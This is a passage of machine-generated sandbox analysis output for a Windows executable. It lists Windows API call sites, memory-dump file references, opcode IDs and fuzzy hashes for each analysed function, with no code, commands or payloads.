                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                            • Opcode ID: 616145a6915a981db8eb491a9e4b2a605aaa0c3770cf40d0944614050dd8c0ad
                                                                                                                                                                                                                                                                            • Instruction ID: 2b42875a4bc742462f888a25792cede479c6146f2fc1397f8c97f3c43ea09ecb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 616145a6915a981db8eb491a9e4b2a605aaa0c3770cf40d0944614050dd8c0ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D5144B5A00219EFCB10CF68C884AAAB7F9FF89310B158559F91ADB310E730E955CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C695F3
                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C6961F
                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C69677
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C6969C
                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C696A4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                            • Opcode ID: b776fadad527b262a3a5ef200527fb60f8703b3a4a7eb8f419d82a77930f4d32
                                                                                                                                                                                                                                                                            • Instruction ID: 0b3fd6f4aa4214b4bea7d7a5f4a4c40ad6714113ef7bfc6f8a0f33297cf449a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b776fadad527b262a3a5ef200527fb60f8703b3a4a7eb8f419d82a77930f4d32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58512B35A00219AFCF15DF54C881AADBBF5FF49314F048098E95AAB362CB35ED45CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C7999D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C79A2D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C79A49
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C79A8F
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C79AAF
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C61A02,?,753CE610), ref: 00C0F9F1
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C50354,00000000,00000000,?,?,00C61A02,?,753CE610,?,00C50354), ref: 00C0FA18
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                            • Opcode ID: f703f9f0887fdd7929d3fba95029a95793239dc272a3f436b3536fa273b3a997
                                                                                                                                                                                                                                                                            • Instruction ID: bcdfed9ea6474bd04f937e63b837700f14df14892120e3355b26ffa77b347828
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f703f9f0887fdd7929d3fba95029a95793239dc272a3f436b3536fa273b3a997
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C5136356012099FCB05DF68C485DADBBF0FF09324B14C1A8E91A9B762D731EE86CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C8766B
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00C87682
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C876AB
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C6B5BE,00000000,00000000), ref: 00C876D0
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C876FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                            • Opcode ID: fb6c06cdc6101d21c1b4eabced37871c77796dd75329eeae962e2ac962d2ff14
                                                                                                                                                                                                                                                                            • Instruction ID: 920e5a4d410ffb61fa34c78f858f99c8dc3d7b752e98b47ccd685c55c41e5a87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb6c06cdc6101d21c1b4eabced37871c77796dd75329eeae962e2ac962d2ff14
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3041B135A08504AFD725AF6CCC48FAA7BA5EB05354F250364F829A72E0F670EE50D758
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                            • Opcode ID: a86517ea671585b7a540cdd9c1d9a8aa3821f8bbac6e08cff0c0351610991ef7
                                                                                                                                                                                                                                                                            • Instruction ID: d8da71ca28182904d5dd6d38b5189a6db3e8af17a4f42741d3de94c419d797d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a86517ea671585b7a540cdd9c1d9a8aa3821f8bbac6e08cff0c0351610991ef7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1841D432A00210AFCB24EF78D881A9DB3E5EF89314F254569E515EB751DB31EE41DB80
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00BF19E1
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00BF19FE
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00BF1A23
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00BF1A3D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6aba3eb2fcdc3323ba25d347ffeb6d6fdeaacbf9c28e6722123f3c5498ec00df
                                                                                                                                                                                                                                                                            • Instruction ID: b5aa0a64c1e8f7d6d12d38dbd32f0902dd67561959f70b119ada3aefea0f714c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6aba3eb2fcdc3323ba25d347ffeb6d6fdeaacbf9c28e6722123f3c5498ec00df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1416D71A0414AFFDF15AF68C844BFEB7B4FB05324F20865AE439A3290D7346A54DB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00C64310
                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C64367
                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C64390
                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C6439A
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C643AB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3758190ce61f49f930ede3a0e98fe26a50c572630c4cef25c09905d2c4b9bf93
                                                                                                                                                                                                                                                                            • Instruction ID: 6a4d35f855a0060f305b506161a43e1b6c05e91f047ddd375b86ed0a57003fec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3758190ce61f49f930ede3a0e98fe26a50c572630c4cef25c09905d2c4b9bf93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B31A370504386DEEB3DDB75D8C9FBA3BA8AB01305F044579E4B2C22B0E7B49985CB25
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C52262
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C5230E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00C52316
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C52327
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C5232F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                            • Opcode ID: db9dc1f7ca13c34405408de60061f93bd9f98040e9dbe52578d49ea0bdc105ab
                                                                                                                                                                                                                                                                            • Instruction ID: 23947e82014b921ac7f5c5b543e645b228c92c01bc15f132526f1f474a092b17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db9dc1f7ca13c34405408de60061f93bd9f98040e9dbe52578d49ea0bdc105ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A031D375900219EFDB00CFA8CD88BDE3BB5EB05325F004215FD26A72D0C370AA84DB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6D97D
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00C6D9B4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6D9F9
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6DA0D
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C6CC63,00000000), ref: 00C6DA37
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                            • Opcode ID: 82a5c82fd7dbdf58036e4691ab229f29112ffa030f6f413eb820fd23b60d7012
                                                                                                                                                                                                                                                                            • Instruction ID: 8527755166799dcd347742dc2b4733915e612cd46ebc0c0887de12834211a145
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82a5c82fd7dbdf58036e4691ab229f29112ffa030f6f413eb820fd23b60d7012
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89314B71A04205EFDB20DFA6D8C4AAEB7F8EF04354B20442EE557D6151DB30AE41AB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C861E4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C8623C
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8624E
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C86259
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C862B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                            • Opcode ID: 30198edabec76115449f8a8a51003aa290c234197bae32bc3f176910b91e08d6
                                                                                                                                                                                                                                                                            • Instruction ID: 3c245dd201fcde8bdb119d21e1ade4a4c81e525de5ff0ff3fa83750aff9bf7b2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30198edabec76115449f8a8a51003aa290c234197bae32bc3f176910b91e08d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B62196759002189ADB21EFA4CC84EEE77B9FF05328F104256FA25EB1C4D7709A85DF54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00C713AE
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C713C5
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C71401
                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C7140D
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C71445
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                            • Opcode ID: e641ee9fcdf0aa23fd27315044938344ca7853f7b459ba28ff9e09f2e5a24ccf
                                                                                                                                                                                                                                                                            • Instruction ID: 7fa29b4fd4d942b934297fec83a6851b74fe0813d199a3bb06ef02e43b818800
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e641ee9fcdf0aa23fd27315044938344ca7853f7b459ba28ff9e09f2e5a24ccf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F218136600208AFD714EF65DC88BAEBBF5EF48300B048469F95AD77A1DA70AD44DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00C2D146
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2D169
                                                                                                                                                                                                                                                                              • Part of subcall function 00C23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C2D18F
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2D1A2
                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C2D1B1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7506833d316da27750597be5245f53355ee4744c686204c8639eba5da35a6022
                                                                                                                                                                                                                                                                            • Instruction ID: 384651f2e7d716bfe176022a6a515d90f98f17382b03f79a61761a97a6b1fdf9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7506833d316da27750597be5245f53355ee4744c686204c8639eba5da35a6022
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6101B1736056357F23216A666C8CE7F6A6DDED2B713140169BD06C2A80DA608D11D2B0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4c9dbc00b60aefbbc33982cf9831402e3c0e2128f7e52945264353f83b43e87e
                                                                                                                                                                                                                                                                            • Instruction ID: 753ff5a31565c23b68208f8ea79ccad14c2ac0b7fa72b613c76133ed88bd8fe0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9dbc00b60aefbbc33982cf9831402e3c0e2128f7e52945264353f83b43e87e
